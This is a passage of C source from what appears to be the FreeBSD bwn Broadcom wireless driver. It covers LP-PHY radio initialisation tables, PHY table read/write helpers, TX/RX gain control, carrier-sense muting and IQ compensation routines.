0xF7, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_MIX3, 0x71, 0x71, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_MIX4, 0x71, 0x71, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_1ST2, 0xf0, 0x30, FLAG_A, }, { BWN_B2063_A_RX_PS6, 0x77, 0x77, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_MIX4, 0x3, 0x3, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_MIX5, 0xf, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_MIX6, 0xf, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_RX_TIA_CTL1, 0x77, 0x77, FLAG_A | FLAG_G, }, { BWN_B2063_RX_TIA_CTL3, 0x77, 0x77, FLAG_A | FLAG_G, }, { BWN_B2063_RX_BB_CTL2, 0x4, 0x4, FLAG_A | FLAG_G, }, { BWN_B2063_PA_CTL1, 0x0, 0x4, FLAG_A, }, { BWN_B2063_VREG_CTL1, 0x3, 0x3, FLAG_A | FLAG_G, }, }; const struct bwn_b206x_rfinit_entry *br; unsigned int i; for (i = 0; i < N(bwn_b2063_init_tab); i++) { br = &bwn_b2063_init_tab[i]; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { if (br->br_flags & FLAG_G) BWN_RF_WRITE(mac, br->br_offset, br->br_valueg); } else { if (br->br_flags & FLAG_A) BWN_RF_WRITE(mac, br->br_offset, br->br_valuea); } } #undef FLAG_A #undef FLAG_B } static void bwn_tab_read_multi(struct bwn_mac *mac, uint32_t typenoffset, int count, void *_data) { unsigned int i; uint32_t offset, type; uint8_t *data = _data; type = BWN_TAB_GETTYPE(typenoffset); offset = BWN_TAB_GETOFFSET(typenoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); for (i = 0; i < count; i++) { switch (type) { case BWN_TAB_8BIT: *data = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO) & 0xff; data++; break; case BWN_TAB_16BIT: *((uint16_t *)data) = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); data += 2; break; case BWN_TAB_32BIT: *((uint32_t *)data) = BWN_PHY_READ(mac, BWN_PHY_TABLEDATAHI); *((uint32_t *)data) <<= 16; *((uint32_t *)data) |= BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); data += 4; break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } } static void bwn_tab_write_multi(struct bwn_mac *mac, uint32_t typenoffset, int count, const void *_data) { uint32_t offset, type, value; const uint8_t *data = _data; unsigned int i; type = BWN_TAB_GETTYPE(typenoffset); offset = BWN_TAB_GETOFFSET(typenoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); for (i = 0; i < count; i++) { switch (type) { case BWN_TAB_8BIT: value = *data; data++; KASSERT(!(value & ~0xff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_16BIT: value = *((const uint16_t *)data); data += 2; KASSERT(!(value & ~0xffff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_32BIT: value = *((const uint32_t *)data); data += 4; BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATAHI, value >> 16); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, 
__LINE__));
		}
	}
}

/*
 * Read back the currently programmed TX gain (DAC, gm, PGA and PAD
 * stages) from the override registers.
 */
static struct bwn_txgain
bwn_phy_lp_get_txgain(struct bwn_mac *mac)
{
	struct bwn_txgain tg;
	uint16_t tmp;

	tg.tg_dac = (BWN_PHY_READ(mac, BWN_PHY_AFE_DAC_CTL) & 0x380) >> 7;
	if (mac->mac_phy.rev < 2) {
		tmp = BWN_PHY_READ(mac,
		    BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL) & 0x7ff;
		tg.tg_gm = tmp & 0x0007;
		tg.tg_pga = (tmp & 0x0078) >> 3;
		tg.tg_pad = (tmp & 0x780) >> 7;
		return (tg);
	}
	tmp = BWN_PHY_READ(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL);
	tg.tg_pad = BWN_PHY_READ(mac, BWN_PHY_OFDM(0xfb)) & 0xff;
	tg.tg_gm = tmp & 0xff;
	tg.tg_pga = (tmp >> 8) & 0xff;
	return (tg);
}

/* The baseband multiplier is kept in the high byte of table 0, entry 87. */
static uint8_t
bwn_phy_lp_get_bbmult(struct bwn_mac *mac)
{

	return (bwn_tab_read(mac, BWN_TAB_2(0, 87)) & 0xff00) >> 8;
}

static void
bwn_phy_lp_set_txgain(struct bwn_mac *mac, struct bwn_txgain *tg)
{
	uint16_t pa;

	if (mac->mac_phy.rev < 2) {
		BWN_PHY_SETMASK(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, 0xf800,
		    (tg->tg_pad << 7) | (tg->tg_pga << 3) | tg->tg_gm);
		bwn_phy_lp_set_txgain_dac(mac, tg->tg_dac);
		bwn_phy_lp_set_txgain_override(mac);
		return;
	}

	pa = bwn_phy_lp_get_pa_gain(mac);
	BWN_PHY_WRITE(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL,
	    (tg->tg_pga << 8) | tg->tg_gm);
	BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfb), 0x8000,
	    tg->tg_pad | (pa << 6));
	BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xfc), (tg->tg_pga << 8) | tg->tg_gm);
	BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfd), 0x8000,
	    tg->tg_pad | (pa << 8));
	bwn_phy_lp_set_txgain_dac(mac, tg->tg_dac);
	bwn_phy_lp_set_txgain_override(mac);
}

static void
bwn_phy_lp_set_bbmult(struct bwn_mac *mac, uint8_t bbmult)
{

	bwn_tab_write(mac, BWN_TAB_2(0, 87), (uint16_t)bbmult << 8);
}

/* Force the TR (TX/RX) switch state through the RF override registers. */
static void
bwn_phy_lp_set_trsw_over(struct bwn_mac *mac, uint8_t tx, uint8_t rx)
{
	uint16_t trsw = (tx << 1) | rx;

	BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffc, trsw);
	BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x3);
}

/*
 * Apply a packed RX gain word; the field layout differs between
 * PHY revision < 2 and >= 2.
 */
static void
bwn_phy_lp_set_rxgain(struct bwn_mac *mac, uint32_t gain)
{
	struct bwn_softc *sc = mac->mac_sc;
	struct ifnet *ifp = sc->sc_ifp;
	struct ieee80211com *ic = ifp->if_l2com;
	uint16_t ext_lna, high_gain, lna, low_gain, trsw, tmp;

	if (mac->mac_phy.rev < 2) {
		trsw = gain & 0x1;
		lna = (gain & 0xfffc) | ((gain & 0xc) >> 2);
		ext_lna = (gain & 2) >> 1;
		BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffe, trsw);
		BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfbff,
		    ext_lna << 10);
		BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xf7ff,
		    ext_lna << 11);
		BWN_PHY_WRITE(mac, BWN_PHY_RX_GAIN_CTL_OVERRIDE_VAL, lna);
	} else {
		low_gain = gain & 0xffff;
		high_gain = (gain >> 16) & 0xf;
		ext_lna = (gain >> 21) & 0x1;
		trsw = ~(gain >> 20) & 0x1;
		BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffe, trsw);
		BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfdff,
		    ext_lna << 9);
		BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfbff,
		    ext_lna << 10);
		BWN_PHY_WRITE(mac, BWN_PHY_RX_GAIN_CTL_OVERRIDE_VAL, low_gain);
		BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xfff0, high_gain);
		if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) {
			tmp = (gain >> 2) & 0x3;
			BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL,
			    0xe7ff, tmp << 11);
			BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xe6), 0xffe7,
			    tmp << 3);
		}
	}

	BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x1);
	BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x10);
	BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x40);
	if (mac->mac_phy.rev >= 2) {
		BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x100);
		if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) {
			BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x400);
			BWN_PHY_SET(mac, BWN_PHY_OFDM(0xe5), 0x8);
		}
		return;
	}
	BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x200);
}

/*
 * "Deaf" mode: mute carrier sense (CRS) so calibration tones do not
 * trigger the receiver; bwn_phy_lp_clear_deaf() restores it per band.
 */
static void
bwn_phy_lp_set_deaf(struct bwn_mac *mac,
    uint8_t user)
{
	struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp;

	if (user)
		plp->plp_crsusr_off = 1;
	else
		plp->plp_crssys_off = 1;
	BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xff1f, 0x80);
}

static void
bwn_phy_lp_clear_deaf(struct bwn_mac *mac, uint8_t user)
{
	struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp;
	struct bwn_softc *sc = mac->mac_sc;
	struct ifnet *ifp = sc->sc_ifp;
	struct ieee80211com *ic = ifp->if_l2com;

	if (user)
		plp->plp_crsusr_off = 0;
	else
		plp->plp_crssys_off = 0;

	/* Only re-enable CRS once neither the user nor the system holds it off. */
	if (plp->plp_crsusr_off || plp->plp_crssys_off)
		return;

	if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan))
		BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xff1f, 0x60);
	else
		BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xff1f, 0x20);
}

/* Integer square root, table-driven for arguments below 256. */
static unsigned int
bwn_sqrt(struct bwn_mac *mac, unsigned int x)
{
	/* Table holding (10 * sqrt(x)) for x between 1 and 256. */
	static uint8_t sqrt_table[256] = {
		10, 14, 17, 20, 22, 24, 26, 28, 30, 31, 33, 34, 36, 37, 38, 40,
		41, 42, 43, 44, 45, 46, 47, 48, 50, 50, 51, 52, 53, 54, 55, 56,
		57, 58, 59, 60, 60, 61, 62, 63, 64, 64, 65, 66, 67, 67, 68, 69,
		70, 70, 71, 72, 72, 73, 74, 74, 75, 76, 76, 77, 78, 78, 79, 80,
		80, 81, 81, 82, 83, 83, 84, 84, 85, 86, 86, 87, 87, 88, 88, 89,
		90, 90, 91, 91, 92, 92, 93, 93, 94, 94, 95, 95, 96, 96, 97, 97,
		98, 98, 99, 100, 100, 100, 101, 101, 102, 102, 103, 103, 104,
		104, 105, 105, 106, 106, 107, 107, 108, 108, 109, 109, 110,
		110, 110, 111, 111, 112, 112, 113, 113, 114, 114, 114, 115,
		115, 116, 116, 117, 117, 117, 118, 118, 119, 119, 120, 120,
		120, 121, 121, 122, 122, 122, 123, 123, 124, 124, 124, 125,
		125, 126, 126, 126, 127, 127, 128, 128, 128, 129, 129, 130,
		130, 130, 131, 131, 131, 132, 132, 133, 133, 133, 134, 134,
		134, 135, 135, 136, 136, 136, 137, 137, 137, 138, 138, 138,
		139, 139, 140, 140, 140, 141, 141, 141, 142, 142, 142, 143,
		143, 143, 144, 144, 144, 145, 145, 145, 146, 146, 146, 147,
		147, 147, 148, 148, 148, 149, 149, 150, 150, 150, 150, 151,
		151, 151, 152, 152, 152, 153, 153, 153, 154, 154, 154, 155,
		155, 155, 156, 156, 156, 157, 157, 157, 158, 158, 158, 159,
		159, 159, 160
	};

	if (x == 0)
		return (0);
	if (x >= 256) {
		unsigned int tmp;

		for (tmp = 0; x >= (2 * tmp) + 1; x -= (2 * tmp++) + 1)
			/* do nothing */ ;
		return (tmp);
	}
	return (sqrt_table[x - 1] / 10);
}

static int
bwn_phy_lp_calc_rx_iq_comp(struct bwn_mac *mac, uint16_t sample)
{
#define	CALC_COEFF(_v, _x, _y, _z)	do {				\
	int _t;								\
	_t = _x - 20;							\
	if (_t >= 0) {							\
		_v = ((_y << (30 - _x)) + (_z >> (1 + _t))) / (_z >> _t); \
	} else {							\
		_v = ((_y << (30 - _x)) + (_z << (-1 - _t))) / (_z << -_t); \
	}								\
} while (0)
#define	CALC_COEFF2(_v, _x, _y, _z)	do {				\
	int _t;								\
	_t = _x - 11;							\
	if (_t >= 0)							\
		_v = (_y << (31 - _x)) / (_z >> _t);			\
	else								\
		_v = (_y << (31 - _x)) / (_z << -_t);			\
} while (0)
	struct bwn_phy_lp_iq_est ie;
	uint16_t v0, v1;
	int tmp[2], ret;

	/* Save the current coefficients (v0 = high byte, v1 = low byte). */
	v1 = BWN_PHY_READ(mac, BWN_PHY_RX_COMP_COEFF_S);
	v0 = v1 >> 8;
	v1 &= 0xff;

	BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0xff00, 0x00c0);
	BWN_PHY_MASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0x00ff);

	ret = bwn_phy_lp_rx_iq_est(mac, sample, 32, &ie);
	if (ret == 0)
		goto done;

	if (ie.ie_ipwr + ie.ie_qpwr < 2) {
		ret = 0;
		goto done;
	}

	CALC_COEFF(tmp[0], bwn_nbits(ie.ie_iqprod), ie.ie_iqprod, ie.ie_ipwr);
	CALC_COEFF2(tmp[1], bwn_nbits(ie.ie_qpwr), ie.ie_qpwr, ie.ie_ipwr);
	tmp[1] = -bwn_sqrt(mac, tmp[1] - (tmp[0] * tmp[0]));
	v0 = tmp[0] >> 3;
	v1 = tmp[1] >> 4;
done:
	BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0xff00, v1);
	BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0x00ff, v0 << 8);
	return ret;
#undef CALC_COEFF
#undef CALC_COEFF2
}

static void
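/*
 * bwn_phy_lp_tblinit_r01() below fills the static PHY tables used by LP-PHY
 * revisions 0 and 1: noise scale, CRS gain, filter and power-save control
 * words, the OFDM/CCK gain ladders (separate rev 0 and rev 1 variants),
 * gain deltas and the TX power control table.  Judging from the
 * bwn_tab_read()/bwn_tab_write() helpers, each BWN_TAB_n(id, off) selector
 * presumably encodes the entry width (1/2/4 bytes, per the suffix), the
 * table id and the starting offset consumed by bwn_tab_write_multi().
 */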
bwn_phy_lp_tblinit_r01(struct bwn_mac *mac) { static const uint16_t noisescale[] = { 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa400, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0x00a4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4c00, 0x2d36, 0x0000, 0x0000, 0x4c00, 0x2d36, }; static const uint16_t crsgainnft[] = { 0x0366, 0x036a, 0x036f, 0x0364, 0x0367, 0x036d, 0x0374, 0x037f, 0x036f, 0x037b, 0x038a, 0x0378, 0x0367, 0x036d, 0x0375, 0x0381, 0x0374, 0x0381, 0x0392, 0x03a9, 0x03c4, 0x03e1, 0x0001, 0x001f, 0x0040, 0x005e, 0x007f, 0x009e, 0x00bd, 0x00dd, 0x00fd, 0x011d, 0x013d, }; static const uint16_t filterctl[] = { 0xa0fc, 0x10fc, 0x10db, 0x20b7, 0xff93, 0x10bf, 0x109b, 0x2077, 0xff53, 0x0127, }; static const uint32_t psctl[] = { 0x00010000, 0x000000a0, 0x00040000, 0x00000048, 0x08080101, 0x00000080, 0x08080101, 0x00000040, 0x08080101, 0x000000c0, 0x08a81501, 0x000000c0, 0x0fe8fd01, 0x000000c0, 0x08300105, 0x000000c0, 0x08080201, 0x000000c0, 0x08280205, 0x000000c0, 0xe80802fe, 0x000000c7, 0x28080206, 0x000000c0, 0x08080202, 0x000000c0, 0x0ba87602, 0x000000c0, 0x1068013d, 0x000000c0, 0x10280105, 0x000000c0, 0x08880102, 0x000000c0, 0x08280106, 0x000000c0, 0xe80801fd, 0x000000c7, 0xa8080115, 0x000000c0, }; static const uint16_t ofdmcckgain_r0[] = { 0x0001, 0x0001, 0x0001, 0x0001, 0x1001, 0x2001, 0x3001, 0x4001, 0x5001, 0x6001, 0x7001, 0x7011, 0x7021, 0x2035, 0x2045, 0x2055, 0x2065, 0x2075, 0x006d, 0x007d, 0x014d, 0x015d, 0x115d, 0x035d, 0x135d, 0x055d, 0x155d, 0x0d5d, 0x1d5d, 0x2d5d, 0x555d, 0x655d, 0x755d, }; static const uint16_t ofdmcckgain_r1[] = { 0x5000, 0x6000, 0x7000, 0x0001, 0x1001, 0x2001, 0x3001, 0x4001, 0x5001, 0x6001, 0x7001, 0x7011, 0x7021, 0x2035, 0x2045, 0x2055, 0x2065, 0x2075, 0x006d, 0x007d, 0x014d, 0x015d, 0x115d, 0x035d, 0x135d, 0x055d, 0x155d, 0x0d5d, 0x1d5d, 0x2d5d, 0x555d, 0x655d, 0x755d, }; static const uint16_t gaindelta[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, }; static const uint32_t txpwrctl[] = { 0x00000050, 0x0000004f, 0x0000004e, 0x0000004d, 0x0000004c, 0x0000004b, 0x0000004a, 0x00000049, 0x00000048, 0x00000047, 0x00000046, 0x00000045, 0x00000044, 0x00000043, 0x00000042, 0x00000041, 0x00000040, 0x0000003f, 0x0000003e, 0x0000003d, 0x0000003c, 0x0000003b, 0x0000003a, 0x00000039, 0x00000038, 0x00000037, 0x00000036, 0x00000035, 0x00000034, 0x00000033, 0x00000032, 0x00000031, 0x00000030, 0x0000002f, 0x0000002e, 0x0000002d, 0x0000002c, 0x0000002b, 0x0000002a, 0x00000029, 0x00000028, 0x00000027, 0x00000026, 0x00000025, 0x00000024, 0x00000023, 0x00000022, 0x00000021, 0x00000020, 0x0000001f, 0x0000001e, 0x0000001d, 0x0000001c, 0x0000001b, 0x0000001a, 0x00000019, 0x00000018, 0x00000017, 0x00000016, 0x00000015, 0x00000014, 0x00000013, 0x00000012, 0x00000011, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x000075a0, 0x000075a0, 0x000075a1, 0x000075a1, 0x000075a2, 0x000075a2, 0x000075a3, 0x000075a3, 0x000074b0, 0x000074b0, 0x000074b1, 0x000074b1, 0x000074b2, 0x000074b2, 0x000074b3, 0x000074b3, 0x00006d20, 0x00006d20, 0x00006d21, 0x00006d21, 0x00006d22, 0x00006d22, 0x00006d23, 0x00006d23, 0x00004660, 0x00004660, 0x00004661, 0x00004661, 0x00004662, 0x00004662, 0x00004663, 0x00004663, 0x00003e60, 0x00003e60, 0x00003e61, 0x00003e61, 0x00003e62, 0x00003e62, 0x00003e63, 0x00003e63, 0x00003660, 0x00003660, 0x00003661, 0x00003661, 0x00003662, 0x00003662, 0x00003663, 0x00003663, 0x00002e60, 0x00002e60, 0x00002e61, 0x00002e61, 0x00002e62, 0x00002e62, 0x00002e63, 0x00002e63, 0x00002660, 0x00002660, 0x00002661, 0x00002661, 0x00002662, 0x00002662, 0x00002663, 0x00002663, 0x000025e0, 0x000025e0, 0x000025e1, 0x000025e1, 0x000025e2, 0x000025e2, 0x000025e3, 0x000025e3, 0x00001de0, 0x00001de0, 0x00001de1, 0x00001de1, 0x00001de2, 0x00001de2, 0x00001de3, 0x00001de3, 0x00001d60, 0x00001d60, 0x00001d61, 0x00001d61, 0x00001d62, 0x00001d62, 0x00001d63, 0x00001d63, 0x00001560, 0x00001560, 0x00001561, 0x00001561, 0x00001562, 0x00001562, 0x00001563, 0x00001563, 0x00000d60, 0x00000d60, 0x00000d61, 0x00000d61, 0x00000d62, 0x00000d62, 0x00000d63, 0x00000d63, 0x00000ce0, 0x00000ce0, 0x00000ce1, 0x00000ce1, 0x00000ce2, 0x00000ce2, 0x00000ce3, 0x00000ce3, 0x00000e10, 0x00000e10, 0x00000e11, 0x00000e11, 0x00000e12, 0x00000e12, 0x00000e13, 0x00000e13, 0x00000bf0, 0x00000bf0, 0x00000bf1, 0x00000bf1, 0x00000bf2, 0x00000bf2, 0x00000bf3, 0x00000bf3, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 
0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x000000ff, 0x000002fc, 0x0000fa08, 0x00000305, 0x00000206, 0x00000304, 0x0000fb04, 0x0000fcff, 0x000005fb, 0x0000fd01, 0x00000401, 0x00000006, 0x0000ff03, 0x000007fc, 0x0000fc08, 0x00000203, 0x0000fffb, 0x00000600, 0x0000fa01, 0x0000fc03, 0x0000fe06, 0x0000fe00, 0x00000102, 0x000007fd, 0x000004fb, 0x000006ff, 0x000004fd, 0x0000fdfa, 0x000007fb, 0x0000fdfa, 0x0000fa06, 0x00000500, 0x0000f902, 0x000007fa, 0x0000fafa, 0x00000500, 0x000007fa, 0x00000700, 0x00000305, 0x000004ff, 0x00000801, 0x00000503, 0x000005f9, 0x00000404, 0x0000fb08, 0x000005fd, 0x00000501, 0x00000405, 0x0000fb03, 0x000007fc, 0x00000403, 0x00000303, 0x00000402, 0x0000faff, 0x0000fe05, 0x000005fd, 0x0000fe01, 0x000007fa, 0x00000202, 0x00000504, 0x00000102, 0x000008fe, 0x0000fa04, 0x0000fafc, 0x0000fe08, 0x000000f9, 0x000002fa, 0x000003fe, 0x00000304, 0x000004f9, 0x00000100, 0x0000fd06, 0x000008fc, 0x00000701, 0x00000504, 0x0000fdfe, 0x0000fdfc, 0x000003fe, 0x00000704, 0x000002fc, 0x000004f9, 0x0000fdfd, 0x0000fa07, 0x00000205, 0x000003fd, 0x000005fb, 0x000004f9, 0x00000804, 0x0000fc06, 0x0000fcf9, 0x00000100, 0x0000fe05, 0x00000408, 0x0000fb02, 0x00000304, 0x000006fe, 0x000004fa, 0x00000305, 0x000008fc, 0x00000102, 0x000001fd, 0x000004fc, 0x0000fe03, 0x00000701, 0x000001fb, 0x000001f9, 0x00000206, 0x000006fd, 0x00000508, 0x00000700, 0x00000304, 0x000005fe, 0x000005ff, 0x0000fa04, 0x00000303, 0x0000fefb, 0x000007f9, 0x0000fefc, 0x000004fd, 0x000005fc, 0x0000fffd, 0x0000fc08, 0x0000fbf9, 0x0000fd07, 0x000008fb, 0x0000fe02, 0x000006fb, 0x00000702, }; KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); bwn_tab_write_multi(mac, BWN_TAB_1(2, 0), N(bwn_tab_sigsq_tbl), bwn_tab_sigsq_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(1, 0), N(noisescale), noisescale); bwn_tab_write_multi(mac, BWN_TAB_2(14, 0), N(crsgainnft), crsgainnft); bwn_tab_write_multi(mac, BWN_TAB_2(8, 0), N(filterctl), filterctl); bwn_tab_write_multi(mac, BWN_TAB_4(9, 0), N(psctl), psctl); bwn_tab_write_multi(mac, BWN_TAB_1(6, 0), N(bwn_tab_pllfrac_tbl), bwn_tab_pllfrac_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(0, 0), N(bwn_tabl_iqlocal_tbl), bwn_tabl_iqlocal_tbl); if (mac->mac_phy.rev == 0) { bwn_tab_write_multi(mac, BWN_TAB_2(13, 0), N(ofdmcckgain_r0), ofdmcckgain_r0); bwn_tab_write_multi(mac, BWN_TAB_2(12, 0), N(ofdmcckgain_r0), ofdmcckgain_r0); } else { bwn_tab_write_multi(mac, BWN_TAB_2(13, 0), N(ofdmcckgain_r1), ofdmcckgain_r1); bwn_tab_write_multi(mac, BWN_TAB_2(12, 0), N(ofdmcckgain_r1), ofdmcckgain_r1); } bwn_tab_write_multi(mac, BWN_TAB_2(15, 0), N(gaindelta), gaindelta); bwn_tab_write_multi(mac, BWN_TAB_4(10, 0), N(txpwrctl), txpwrctl); } static void bwn_phy_lp_tblinit_r2(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int i; static const uint16_t noisescale[] = { 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x0000, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 
